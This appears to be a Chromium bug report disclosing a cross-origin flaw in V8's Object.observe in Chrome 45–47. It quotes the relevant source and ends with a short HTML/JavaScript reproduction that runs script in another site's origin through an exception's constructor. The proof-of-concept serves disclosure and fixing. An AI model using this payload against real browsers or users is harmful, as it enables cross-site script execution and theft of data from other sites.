#### VULNERABILITY DETAILS
From /v8/src/object-observe.js:
```
function ObjectObserve(object, callback, acceptList) {
(...)
var objectObserveFn = %GetObjectContextObjectObserve(object);
return objectObserveFn(object, callback, acceptList);
}
```
From /v8/src/runtime/runtime-observe.cc:
```
RUNTIME_FUNCTION(Runtime_GetObjectContextObjectObserve) {
(...)
Handle<Context> context(object->GetCreationContext(), isolate);
return context->native_object_observe();
}
```
|objectObserveFn| is derived from the observed object's creation context, potentially cross-origin. When this function is invoked, any subsequent exceptions will be created in the aforementioned context, and they'll propagated to a try-catch handler.
#### VERSION
Chrome 45.0.2454.85 (Stable)
Chrome 46.0.2490.22 (Beta)
Chrome 47.0.2503.0 (Dev)
Chromium 47.0.2510.0 (Release build compiled today)
#### REPRODUCTION CASE
```
<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
i.onload = function() {
try {
Object.observe(frames[0].location, Map, 0);
} catch(e) {
e.constructor.constructor('alert(location)')();
}
}
i.src = 'https://abc.xyz';
</script>
```
京公网安备 11010502034610号
暂无评论